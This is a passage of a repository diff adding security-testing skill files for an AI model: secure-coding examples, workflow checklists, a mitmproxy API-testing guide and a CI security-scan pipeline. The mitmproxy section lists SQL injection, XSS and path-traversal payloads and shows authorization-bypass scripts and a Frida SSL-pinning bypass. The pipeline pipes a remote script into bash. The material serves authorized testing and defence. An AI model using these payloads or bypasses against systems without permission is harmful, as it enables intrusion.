// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
ALLOWED_ATTR: []
});
```
**Step 4: Content Security Policy (CSP)**
```html
<!-- Add CSP header -->
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
```
---
## Advanced Configuration
This section contains detailed configuration options and tuning parameters.
### Example: SAST Tool Configuration
```yaml
# Advanced security scanner configuration
scanner:
# Severity threshold
severity_threshold: MEDIUM
# Rule configuration
rules:
enabled:
- sql-injection
- xss
- hardcoded-secrets
disabled:
- informational-only
# False positive reduction
confidence_threshold: HIGH
exclude_patterns:
- "*/test/*"
- "*/tests/*"
- "*/node_modules/*"
- "*.test.js"
- "*.spec.ts"
# Performance tuning
max_file_size_kb: 2048
timeout_seconds: 300
parallel_jobs: 4
# Output configuration
output_format: json
include_code_snippets: true
max_snippet_lines: 10
```
---
## Examples and Code Samples
This section provides comprehensive code examples for various scenarios.
### Example 1: Secure API Authentication
```python
# Secure API key handling
import os
from functools import wraps
from flask import Flask, request, jsonify
app = Flask(__name__)
# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
raise ValueError("API_KEY environment variable not set")
def require_api_key(f):
@wraps(f)
def decorated_function(*args, **kwargs):
api_key = request.headers.get('X-API-Key')
if not api_key:
return jsonify({'error': 'API key required'}), 401
# Constant-time comparison to prevent timing attacks
import hmac
if not hmac.compare_digest(api_key, VALID_API_KEY):
return jsonify({'error': 'Invalid API key'}), 403
return f(*args, **kwargs)
return decorated_function
@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
return jsonify({'message': 'Access granted'})
```
### Example 2: Secure Password Hashing
```python
# Secure password storage with bcrypt
import bcrypt
def hash_password(password: str) -> str:
"""Hash a password using bcrypt."""
# Generate salt and hash password
salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)
hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
return hashed.decode('utf-8')
def verify_password(password: str, hashed: str) -> bool:
"""Verify a password against a hash."""
return bcrypt.checkpw(
password.encode('utf-8'),
hashed.encode('utf-8')
)
# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash) # True
```
### Example 3: Secure File Upload
```python
# Secure file upload with validation
import os
import magic
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
'application/pdf',
'image/png',
'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
def is_allowed_file(filename: str, file_content: bytes) -> bool:
"""Validate file extension and MIME type."""
# Check extension
if '.' not in filename:
return False
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
return False
# Check MIME type (prevent extension spoofing)
mime = magic.from_buffer(file_content, mime=True)
if mime not in ALLOWED_MIME_TYPES:
return False
return True
def handle_upload(file):
"""Securely handle file upload."""
# Check file size
file.seek(0, os.SEEK_END)
size = file.tell()
file.seek(0)
if size > MAX_FILE_SIZE:
raise ValueError("File too large")
# Read content for validation
content = file.read()
file.seek(0)
# Validate file type
if not is_allowed_file(file.filename, content):
raise ValueError("Invalid file type")
# Sanitize filename
filename = secure_filename(file.filename)
# Generate unique filename to prevent overwrite attacks
import uuid
unique_filename = f"{uuid.uuid4()}_{filename}"
# Save to secure location (outside web root)
upload_path = os.path.join('/secure/uploads', unique_filename)
file.save(upload_path)
return unique_filename
```
---
## Best Practices for Reference Documents
1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8. **Be concise** - Even in references, challenge every sentence

View File

@@ -0,0 +1,253 @@
# Workflow Checklist Template
This template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.
## Pattern 1: Sequential Workflow Checklist
Use this pattern for operations that must be completed in order, step-by-step.
### Security Assessment Workflow
Progress:
[ ] 1. Identify application entry points and attack surface
[ ] 2. Map authentication and authorization flows
[ ] 3. Identify data flows and sensitive data handling
[ ] 4. Review existing security controls
[ ] 5. Document findings with framework references (OWASP, CWE)
[ ] 6. Prioritize findings by severity (CVSS scores)
[ ] 7. Generate report with remediation recommendations
Work through each step systematically. Check off completed items.
---
## Pattern 2: Conditional Workflow
Use this pattern when the workflow branches based on findings or conditions.
### Vulnerability Remediation Workflow
1. Identify vulnerability type
- If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)
- If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)
- If Authentication flaw → See [auth-remediation.md](auth-remediation.md)
- If Authorization flaw → See [authz-remediation.md](authz-remediation.md)
- If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)
2. Assess severity using CVSS calculator
- If CVSS >= 9.0 → Priority: Critical (immediate action)
- If CVSS 7.0-8.9 → Priority: High (action within 24h)
- If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)
- If CVSS < 4.0 → Priority: Low (action within 30 days)
3. Apply appropriate remediation pattern
4. Validate fix with security testing
5. Document changes and update security documentation
---
## Pattern 3: Iterative Workflow
Use this pattern for operations that repeat across multiple targets or items.
### Code Security Review Workflow
For each file in the review scope:
1. Identify security-sensitive operations (auth, data access, crypto, input handling)
2. Check against secure coding patterns for the language
3. Flag potential vulnerabilities with severity rating
4. Map findings to CWE and OWASP categories
5. Suggest specific remediation approaches
6. Document finding with code location and fix priority
Continue until all files in scope have been reviewed.
---
## Pattern 4: Feedback Loop Workflow
Use this pattern when validation and iteration are required.
### Secure Configuration Generation Workflow
1. Generate initial security configuration based on requirements
2. Run validation script: `./scripts/validate_config.py config.yaml`
3. Review validation output:
- Note all errors (must fix)
- Note all warnings (should fix)
- Note all info items (consider)
4. Fix identified issues in configuration
5. Repeat steps 2-4 until validation passes with zero errors
6. Review warnings and determine if they should be addressed
7. Apply configuration once validation is clean
**Validation Loop**: Run validator → Fix errors → Repeat until clean
---
## Pattern 5: Parallel Analysis Workflow
Use this pattern when multiple independent analyses can run concurrently.
### Comprehensive Security Scan Workflow
Run these scans in parallel:
**Static Analysis**:
[ ] 1a. Run SAST scan (Semgrep/Bandit)
[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)
[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)
[ ] 1d. Run license compliance check
**Dynamic Analysis**:
[ ] 2a. Run DAST scan (ZAP/Burp)
[ ] 2b. Run API security testing
[ ] 2c. Run authentication/authorization testing
**Infrastructure Analysis**:
[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)
[ ] 3b. Run container image scan (Trivy/Grype)
[ ] 3c. Run configuration review
**Consolidation**:
[ ] 4. Aggregate all findings
[ ] 5. Deduplicate and correlate findings
[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)
[ ] 7. Generate unified security report
---
## Pattern 6: Research and Documentation Workflow
Use this pattern for security research and documentation tasks.
### Threat Modeling Workflow
Research Progress:
[ ] 1. Identify system components and boundaries
[ ] 2. Map data flows between components
[ ] 3. Identify trust boundaries
[ ] 4. Enumerate assets (data, services, credentials)
[ ] 5. Apply STRIDE framework to each component:
- Spoofing threats
- Tampering threats
- Repudiation threats
- Information disclosure threats
- Denial of service threats
- Elevation of privilege threats
[ ] 6. Map threats to MITRE ATT&CK techniques
[ ] 7. Identify existing mitigations
[ ] 8. Document residual risks
[ ] 9. Recommend additional security controls
[ ] 10. Generate threat model document
Work through each step systematically. Check off completed items.
---
## Pattern 7: Compliance Validation Workflow
Use this pattern for compliance checks against security standards.
### Security Compliance Audit Workflow
**SOC 2 Controls Review**:
[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)
[ ] 2. Verify logical access controls implementation (CC6.1)
[ ] 3. Review authentication mechanisms (CC6.1)
[ ] 4. Verify encryption implementation (CC6.1, CC6.7)
[ ] 5. Review audit logging configuration (CC7.2)
[ ] 6. Verify security monitoring (CC7.2, CC7.3)
[ ] 7. Review incident response procedures (CC7.3, CC7.4)
[ ] 8. Verify backup and recovery processes (A1.2, A1.3)
**Evidence Collection**:
[ ] 9. Collect policy documents
[ ] 10. Collect configuration screenshots
[ ] 11. Collect audit logs
[ ] 12. Document control gaps
[ ] 13. Generate compliance report
---
## Pattern 8: Incident Response Workflow
Use this pattern for security incident handling.
### Security Incident Response Workflow
**Detection and Analysis**:
[ ] 1. Confirm security incident (rule out false positive)
[ ] 2. Determine incident severity (SEV1/2/3/4)
[ ] 3. Identify affected systems and data
[ ] 4. Preserve evidence (logs, memory dumps, network captures)
**Containment**:
[ ] 5. Isolate affected systems (network segmentation)
[ ] 6. Disable compromised accounts
[ ] 7. Block malicious indicators (IPs, domains, hashes)
[ ] 8. Implement temporary compensating controls
**Eradication**:
[ ] 9. Identify root cause
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
[ ] 11. Patch vulnerabilities exploited
[ ] 12. Reset compromised credentials
**Recovery**:
[ ] 13. Restore systems from clean backups (if needed)
[ ] 14. Re-enable systems with monitoring
[ ] 15. Verify system integrity
[ ] 16. Resume normal operations
**Post-Incident**:
[ ] 17. Document incident timeline
[ ] 18. Identify lessons learned
[ ] 19. Update security controls to prevent recurrence
[ ] 20. Update incident response procedures
[ ] 21. Communicate with stakeholders
---
## Usage Guidelines
### When to Use Workflow Checklists
**Use checklists for**:
- Complex multi-step operations
- Operations requiring specific order
- Security assessments and audits
- Incident response procedures
- Compliance validation tasks
**Don't use checklists for**:
- Simple single-step operations
- Highly dynamic exploratory work
- Operations that vary significantly each time
### Adapting This Template
1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file
2. **Customize steps** to match your specific security tool or process
3. **Add framework references** (OWASP, CWE, NIST) where applicable
4. **Include tool-specific commands** for automation
5. **Add decision points** where manual judgment is required
### Checklist Best Practices
- **Be specific**: "Run semgrep --config=auto ." not "Scan the code"
- **Include success criteria**: "Validation passes with 0 errors"
- **Reference standards**: Link to OWASP, CWE, NIST where relevant
- **Show progress**: Checkbox format helps track completion
- **Provide escape hatches**: "If validation fails, see troubleshooting.md"
### Integration with Feedback Loops
Combine checklists with validation scripts for maximum effectiveness:
1. Create checklist for the workflow
2. Provide validation script that checks quality
3. Include "run validator" step in checklist
4. Loop: Complete step → Validate → Fix issues → Re-validate
This pattern dramatically improves output quality through systematic validation.

5
skills/appsec/.category Normal file
View File

@@ -0,0 +1,5 @@
# Application Security Skills
This directory contains skills for application security operations.
See the main [README.md](../../README.md) for usage and [CONTRIBUTE.md](../../CONTRIBUTE.md) for contribution guidelines.

View File

@@ -0,0 +1,484 @@
---
name: api-mitmproxy
description: >
Interactive HTTPS proxy for API security testing with traffic interception, modification, and
replay capabilities. Supports HTTP/1, HTTP/2, HTTP/3, WebSockets, and TLS-protected protocols.
Includes Python scripting API for automation and multiple interfaces (console, web, CLI). Use when:
(1) Intercepting and analyzing API traffic for security testing, (2) Modifying HTTP/HTTPS requests
and responses to test API behavior, (3) Recording and replaying API traffic for testing, (4)
Debugging mobile app or thick client API communications, (5) Automating API security tests with
Python scripts, (6) Exporting traffic in HAR format for analysis.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [api-testing, proxy, https, intercepting-proxy, traffic-analysis, mitmproxy, har-export, websockets]
frameworks: [OWASP]
dependencies:
python: ">=3.9"
tools: [mitmproxy, mitmweb, mitmdump]
references:
- https://mitmproxy.org/
- https://docs.mitmproxy.org/
---
# mitmproxy API Security Testing
## Overview
mitmproxy is an interactive, TLS-capable intercepting HTTP proxy for penetration testers and developers. It enables real-time inspection, modification, and replay of HTTP/HTTPS traffic including APIs, mobile apps, and thick clients. With support for HTTP/1, HTTP/2, HTTP/3, and WebSockets, mitmproxy provides comprehensive coverage for modern API security testing.
## Interfaces
**mitmproxy** - Interactive console interface with keyboard navigation
**mitmweb** - Web-based GUI for visual traffic inspection
**mitmdump** - Command-line tool for automated traffic capture and scripting
## Quick Start
Install and run mitmproxy:
```bash
# Install via pip
pip install mitmproxy
# Start interactive console proxy
mitmproxy
# Start web interface (default: http://127.0.0.1:8081)
mitmweb
# Start command-line proxy with output
mitmdump -w traffic.flow
```
Configure client to use proxy (default: localhost:8080)
## Core Workflows
### Workflow 1: Interactive API Traffic Inspection
For manual API security testing and analysis:
1. Start mitmproxy or mitmweb:
```bash
# Console interface
mitmproxy --mode regular --listen-host 0.0.0.0 --listen-port 8080
# Or web interface
mitmweb --mode regular --listen-host 0.0.0.0 --listen-port 8080
```
2. Configure target application to use proxy (HTTP: localhost:8080)
3. Install mitmproxy CA certificate on client device
4. Trigger API requests from the application
5. Intercept and inspect requests/responses in mitmproxy
6. Modify requests to test:
- Authentication bypass attempts
- Authorization flaws (IDOR, privilege escalation)
- Input validation (SQLi, XSS, command injection)
- Business logic vulnerabilities
7. Save flows for documentation and reporting
### Workflow 2: Mobile App API Security Testing
Progress:
[ ] 1. Install mitmproxy CA certificate on mobile device
[ ] 2. Configure device WiFi to use mitmproxy as proxy
[ ] 3. Start mitmweb for visual traffic inspection
[ ] 4. Launch mobile app and exercise all features
[ ] 5. Review API endpoints, authentication mechanisms, data flows
[ ] 6. Test for common API vulnerabilities (OWASP API Top 10)
[ ] 7. Export traffic as HAR for further analysis
[ ] 8. Document findings with request/response examples
Work through each step systematically. Check off completed items.
### Workflow 3: Automated API Traffic Recording
For capturing and analyzing API traffic at scale:
1. Start mitmdump with flow capture:
```bash
mitmdump -w api-traffic.flow --mode regular
```
2. Run automated tests or manual app interaction
3. Stop mitmdump (Ctrl+C) to save flows
4. Replay captured traffic:
```bash
# Replay to server
mitmdump -nc -r api-traffic.flow
# Replay with modifications via script
mitmdump -s replay-script.py -r api-traffic.flow
```
5. Export to HAR format for analysis:
```bash
# Using Python API
python3 -c "from mitmproxy.io import FlowReader; from mitmproxy.tools.dump import DumpMaster;
import sys; [print(flow.request.url) for flow in FlowReader(open('api-traffic.flow', 'rb')).stream()]"
```
### Workflow 4: Python Scripting for API Testing
For automated security testing with custom logic:
1. Create Python addon script (`api-test.py`):
```python
from mitmproxy import http
class APISecurityTester:
def request(self, flow: http.HTTPFlow) -> None:
# Modify requests on-the-fly
if "api.example.com" in flow.request.pretty_url:
# Test for authorization bypass
flow.request.headers["X-User-ID"] = "1"
def response(self, flow: http.HTTPFlow) -> None:
# Analyze responses
if flow.response.status_code == 200:
if "admin" in flow.response.text:
print(f"[!] Potential privilege escalation: {flow.request.url}")
addons = [APISecurityTester()]
```
2. Run mitmproxy with script:
```bash
mitmproxy -s api-test.py
# Or for automation
mitmdump -s api-test.py -w results.flow
```
3. Review automated findings and captured traffic
4. Export results for reporting
### Workflow 5: SSL/TLS Certificate Pinning Bypass
For testing mobile apps with certificate pinning:
1. Install mitmproxy CA certificate on device
2. Use certificate unpinning tools or framework modifications:
- Android: Frida script for SSL unpinning
- iOS: SSL Kill Switch or similar tools
3. Configure app traffic through mitmproxy
4. Alternatively, use reverse proxy mode:
```bash
mitmproxy --mode reverse:https://api.example.com --listen-host 0.0.0.0 --listen-port 443
```
5. Modify /etc/hosts to redirect API domain to mitmproxy
6. Intercept and analyze traffic normally
## Operating Modes
mitmproxy supports multiple deployment modes:
**Regular Proxy Mode** (default):
```bash
mitmproxy --mode regular --listen-port 8080
```
Client configures proxy settings explicitly.
**Transparent Proxy Mode** (invisible to client):
```bash
mitmproxy --mode transparent --listen-port 8080
```
Requires iptables/pf rules to redirect traffic.
**Reverse Proxy Mode** (sits in front of server):
```bash
mitmproxy --mode reverse:https://api.example.com --listen-port 443
```
mitmproxy acts as the server endpoint.
**Upstream Proxy Mode** (chain proxies):
```bash
mitmproxy --mode upstream:http://corporate-proxy:8080
```
Routes traffic through another proxy.
## Certificate Installation
Install mitmproxy CA certificate for HTTPS interception:
**Browser/Desktop:**
1. Start mitmproxy and configure proxy settings
2. Visit http://mitm.it
3. Download certificate for your platform
4. Install in system/browser certificate store
**Android:**
1. Push certificate to device: `adb push ~/.mitmproxy/mitmproxy-ca-cert.cer /sdcard/`
2. Settings → Security → Install from SD card
3. Select mitmproxy certificate
**iOS:**
1. Email certificate or host on web server
2. Install profile on device
3. Settings → General → About → Certificate Trust Settings
4. Enable trust for mitmproxy certificate
## Common Patterns
### Pattern 1: API Authentication Testing
Test authentication mechanisms and token handling:
```python
# auth-test.py
from mitmproxy import http
class AuthTester:
def __init__(self):
self.tokens = []
def request(self, flow: http.HTTPFlow):
# Capture auth tokens
if "authorization" in flow.request.headers:
token = flow.request.headers["authorization"]
if token not in self.tokens:
self.tokens.append(token)
print(f"[+] Captured token: {token[:20]}...")
# Test for missing authentication
if "api.example.com" in flow.request.url:
flow.request.headers.pop("authorization", None)
print(f"[*] Testing unauthenticated: {flow.request.path}")
addons = [AuthTester()]
```
### Pattern 2: API Parameter Fuzzing
Fuzz API parameters for injection vulnerabilities:
```python
# fuzz-params.py
from mitmproxy import http
class ParamFuzzer:
def request(self, flow: http.HTTPFlow):
if flow.request.method == "POST" and "api.example.com" in flow.request.url:
# Clone and modify request
original_body = flow.request.text
payloads = ["' OR '1'='1", "<script>alert(1)</script>", "../../../etc/passwd"]
for payload in payloads:
# Modify parameters and test
# (Implementation depends on content-type)
print(f"[*] Testing payload: {payload}")
addons = [ParamFuzzer()]
```
### Pattern 3: GraphQL API Testing
Inspect and test GraphQL APIs:
```python
# graphql-test.py
from mitmproxy import http
import json
class GraphQLTester:
def request(self, flow: http.HTTPFlow):
if "/graphql" in flow.request.path:
try:
data = json.loads(flow.request.text)
query = data.get("query", "")
print(f"[+] GraphQL Query:\n{query}")
# Test for introspection
if "__schema" not in query:
introspection = {"query": "{__schema{types{name}}}"}
print(f"[*] Testing introspection")
except:
pass
addons = [GraphQLTester()]
```
### Pattern 4: HAR Export for Analysis
Export traffic as HTTP Archive for analysis:
```bash
# Export flows to HAR format
mitmdump -s export-har.py -r captured-traffic.flow
# export-har.py
from mitmproxy import http, ctx
import json
class HARExporter:
def done(self):
har_entries = []
# Build HAR structure
# (Simplified - use mitmproxy's built-in HAR addon)
ctx.log.info(f"Exported {len(har_entries)} entries")
addons = [HARExporter()]
```
Or use built-in addon:
```bash
mitmdump --set hardump=./traffic.har
```
## Security Considerations
- **Sensitive Data Handling**: Captured traffic may contain credentials, tokens, PII. Encrypt and secure stored flows. Never commit flow files to version control
- **Access Control**: Restrict access to mitmproxy instance. Use authentication for mitmweb (--web-user/--web-password flags)
- **Audit Logging**: Log all intercepted traffic and modifications for security auditing and compliance
- **Compliance**: Ensure proper authorization before intercepting production traffic. Comply with GDPR, PCI-DSS for sensitive data
- **Safe Defaults**: Use isolated testing environments. Avoid intercepting production traffic without explicit authorization
## Integration Points
### Penetration Testing Workflow
1. Reconnaissance: Identify API endpoints via mitmproxy
2. Authentication testing: Capture and analyze auth tokens
3. Authorization testing: Modify user IDs, roles, permissions
4. Input validation: Inject payloads to test for vulnerabilities
5. Business logic: Test workflows for logical flaws
6. Export findings as HAR for reporting
### CI/CD Integration
Run automated API security tests:
```bash
# Run mitmdump with test script in CI
mitmdump -s api-security-tests.py --anticache -w test-results.flow &
PROXY_PID=$!
# Run API tests through proxy
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=http://localhost:8080
pytest tests/api_tests.py
# Stop proxy and analyze results
kill $PROXY_PID
python3 analyze-results.py test-results.flow
```
### Mobile App Security Testing
Standard workflow for iOS/Android apps:
1. Configure device to use mitmproxy
2. Install CA certificate
3. Bypass SSL pinning if needed
4. Exercise app functionality
5. Analyze API security (OWASP Mobile Top 10)
6. Document API vulnerabilities
## Advanced Features
### Traffic Filtering
Filter displayed traffic by expression:
```bash
# Show only API calls
mitmproxy --view-filter '~d api.example.com'
# Show only POST requests
mitmproxy --view-filter '~m POST'
# Show responses with specific status
mitmproxy --view-filter '~c 401'
# Combine filters
mitmproxy --view-filter '~d api.example.com & ~m POST'
```
### Request/Response Modification
Modify traffic using built-in mappers:
```bash
# Replace request headers
mitmproxy --modify-headers '/~u example/Authorization/Bearer fake-token'
# Replace response body
mitmproxy --modify-body '/~s & ~b "error"/success'
```
### WebSocket Interception
Intercept and modify WebSocket traffic:
```python
# websocket-test.py
from mitmproxy import websocket
class WebSocketTester:
def websocket_message(self, flow):
message = flow.messages[-1]
print(f"[+] WebSocket: {message.content[:100]}")
# Modify messages
if message.from_client:
message.content = message.content.replace(b"user", b"admin")
addons = [WebSocketTester()]
```
## Troubleshooting
### Issue: SSL Certificate Errors
**Solution**: Ensure mitmproxy CA certificate is properly installed and trusted:
```bash
# Verify certificate location
ls ~/.mitmproxy/
# Regenerate certificates if needed
rm -rf ~/.mitmproxy/
mitmproxy # Regenerates on startup
```
### Issue: Mobile App Not Sending Traffic Through Proxy
**Solution**:
- Verify WiFi proxy configuration
- Check firewall rules aren't blocking proxy port
- Ensure mitmproxy is listening on correct interface (0.0.0.0)
- Test with browser first to verify proxy works
### Issue: Certificate Pinning Blocking Interception
**Solution**: Use SSL unpinning tools:
```bash
# Android with Frida
frida -U -l universal-android-ssl-pinning-bypass.js -f com.example.app
# Or modify app to disable pinning (development builds)
```
### Issue: Cannot Intercept HTTP/2 or HTTP/3
**Solution**: mitmproxy supports HTTP/2 by default. For HTTP/3:
```bash
# Enable HTTP/3 support (experimental)
mitmproxy --set http3=true
```
## OWASP API Security Top 10 Testing
Use mitmproxy to test for OWASP API Security Top 10 vulnerabilities:
- **API1: Broken Object Level Authorization** - Modify object IDs in requests
- **API2: Broken Authentication** - Test token validation, session management
- **API3: Broken Object Property Level Authorization** - Test for mass assignment
- **API4: Unrestricted Resource Consumption** - Test rate limiting, pagination
- **API5: Broken Function Level Authorization** - Modify roles, escalate privileges
- **API6: Unrestricted Access to Sensitive Business Flows** - Test business logic
- **API7: Server Side Request Forgery** - Inject URLs in parameters
- **API8: Security Misconfiguration** - Check headers, CORS, error messages
- **API9: Improper Inventory Management** - Enumerate undocumented endpoints
- **API10: Unsafe Consumption of APIs** - Test third-party API integrations
## References
- [mitmproxy Documentation](https://docs.mitmproxy.org/)
- [mitmproxy GitHub](https://github.com/mitmproxy/mitmproxy)
- [OWASP API Security Top 10](https://owasp.org/www-project-api-security/)
- [mitmproxy Addon Examples](https://github.com/mitmproxy/mitmproxy/tree/main/examples)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,357 @@
# Security-Enhanced CI/CD Pipeline Template
#
# This template demonstrates security best practices for CI/CD pipelines.
# Adapt this template to your specific security tool and workflow needs.
#
# Key Security Features:
# - SAST (Static Application Security Testing)
# - Dependency vulnerability scanning
# - Secrets detection
# - Infrastructure-as-Code security scanning
# - Container image scanning
# - Security artifact uploading for compliance
name: Security Scan Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main, develop]
schedule:
# Run weekly security scans on Sunday at 2 AM UTC
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual trigger
# Security: Restrict permissions to minimum required
permissions:
contents: read
security-events: write # For uploading SARIF results
pull-requests: write # For commenting on PRs
env:
# Configuration
SECURITY_SCAN_FAIL_ON: 'critical,high' # Fail build on these severities
REPORT_DIR: 'security-reports'
jobs:
# Job 1: Static Application Security Testing (SAST)
sast-scan:
name: SAST Security Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history for better analysis
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Run SAST Scanner
run: |
# Example: Using Semgrep for SAST
pip install semgrep
semgrep --config=auto \
--json \
--output ${{ env.REPORT_DIR }}/sast-results.json \
. || true
# Alternative: Bandit for Python projects
# pip install bandit
# bandit -r . -f json -o ${{ env.REPORT_DIR }}/bandit-results.json
- name: Process SAST Results
run: |
# Parse results and fail on critical/high severity
python3 -c "
import json
import sys
with open('${{ env.REPORT_DIR }}/sast-results.json') as f:
results = json.load(f)
critical = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'ERROR'])
high = len([r for r in results.get('results', []) if r.get('extra', {}).get('severity') == 'WARNING'])
print(f'Critical findings: {critical}')
print(f'High findings: {high}')
if critical > 0:
print('❌ Build failed: Critical security issues found')
sys.exit(1)
elif high > 0:
print('⚠️ Warning: High severity issues found')
# Optionally fail on high severity
# sys.exit(1)
else:
print('✅ No critical security issues found')
"
- name: Upload SAST Results
if: always()
uses: actions/upload-artifact@v4
with:
name: sast-results
path: ${{ env.REPORT_DIR }}/sast-results.json
retention-days: 30
# Job 2: Dependency Vulnerability Scanning
dependency-scan:
name: Dependency Vulnerability Scan
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Scan Python Dependencies
if: hashFiles('requirements.txt') != ''
run: |
pip install safety
safety check \
--json \
--output ${{ env.REPORT_DIR }}/safety-results.json \
|| true
- name: Scan Node Dependencies
if: hashFiles('package.json') != ''
run: |
npm audit --json > ${{ env.REPORT_DIR }}/npm-audit.json || true
- name: Process Dependency Results
run: |
# Check for critical vulnerabilities
if [ -f "${{ env.REPORT_DIR }}/safety-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/safety-results.json')); print(len([v for v in data.get('vulnerabilities', []) if v.get('severity', '').lower() == 'critical']))")
echo "Critical vulnerabilities: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "❌ Build failed: Critical vulnerabilities in dependencies"
exit 1
fi
fi
- name: Upload Dependency Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: dependency-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 3: Secrets Detection
secrets-scan:
name: Secrets Detection
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0 # Full history to scan all commits
- name: Run Gitleaks
uses: gitleaks/gitleaks-action@v2
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GITLEAKS_ENABLE_SUMMARY: true
- name: Alternative - TruffleHog Scan
if: false # Set to true to enable
run: |
pip install truffleHog
trufflehog --json --regex --entropy=True . \
> ${{ env.REPORT_DIR }}/trufflehog-results.json || true
- name: Upload Secrets Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: secrets-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 4: Container Image Scanning
container-scan:
name: Container Image Security Scan
runs-on: ubuntu-latest
if: hashFiles('Dockerfile') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Build Docker Image
run: |
docker build -t app:${{ github.sha }} .
- name: Run Trivy Scanner
uses: aquasecurity/trivy-action@master
with:
image-ref: app:${{ github.sha }}
format: 'sarif'
output: '${{ env.REPORT_DIR }}/trivy-results.sarif'
severity: 'CRITICAL,HIGH'
- name: Upload Trivy Results to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: '${{ env.REPORT_DIR }}/trivy-results.sarif'
- name: Upload Container Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: container-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 5: Infrastructure-as-Code Security Scanning
iac-scan:
name: IaC Security Scan
runs-on: ubuntu-latest
if: hashFiles('**/*.tf', '**/*.yaml', '**/*.yml') != ''
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Checkov
run: |
pip install checkov
checkov -d . \
--output json \
--output-file ${{ env.REPORT_DIR }}/checkov-results.json \
--quiet \
|| true
- name: Run tfsec (for Terraform)
if: hashFiles('**/*.tf') != ''
run: |
curl -s https://raw.githubusercontent.com/aquasecurity/tfsec/master/scripts/install_linux.sh | bash
tfsec . \
--format json \
--out ${{ env.REPORT_DIR }}/tfsec-results.json \
|| true
- name: Process IaC Results
run: |
# Fail on critical findings
if [ -f "${{ env.REPORT_DIR }}/checkov-results.json" ]; then
critical_count=$(python3 -c "import json; data=json.load(open('${{ env.REPORT_DIR }}/checkov-results.json')); print(data.get('summary', {}).get('failed', 0))")
echo "Failed checks: $critical_count"
if [ "$critical_count" -gt "0" ]; then
echo "⚠️ Warning: IaC security issues found"
# Optionally fail the build
# exit 1
fi
fi
- name: Upload IaC Scan Results
if: always()
uses: actions/upload-artifact@v4
with:
name: iac-scan-results
path: ${{ env.REPORT_DIR }}/
retention-days: 30
# Job 6: Security Report Generation and Notification
security-report:
name: Generate Security Report
runs-on: ubuntu-latest
needs: [sast-scan, dependency-scan, secrets-scan]
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Download All Scan Results
uses: actions/download-artifact@v4
with:
path: all-results/
- name: Generate Consolidated Report
run: |
# Consolidate all security scan results
mkdir -p consolidated-report
cat > consolidated-report/security-summary.md << 'EOF'
# Security Scan Summary
**Scan Date**: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
**Commit**: ${{ github.sha }}
**Branch**: ${{ github.ref_name }}
## Scan Results
### SAST Scan
See artifacts: `sast-results`
### Dependency Scan
See artifacts: `dependency-scan-results`
### Secrets Scan
See artifacts: `secrets-scan-results`
### Container Scan
See artifacts: `container-scan-results`
### IaC Scan
See artifacts: `iac-scan-results`
---
For detailed results, download scan artifacts from this workflow run.
EOF
- name: Comment on PR (if applicable)
if: github.event_name == 'pull_request'
uses: actions/github-script@v7
with:
script: |
const fs = require('fs');
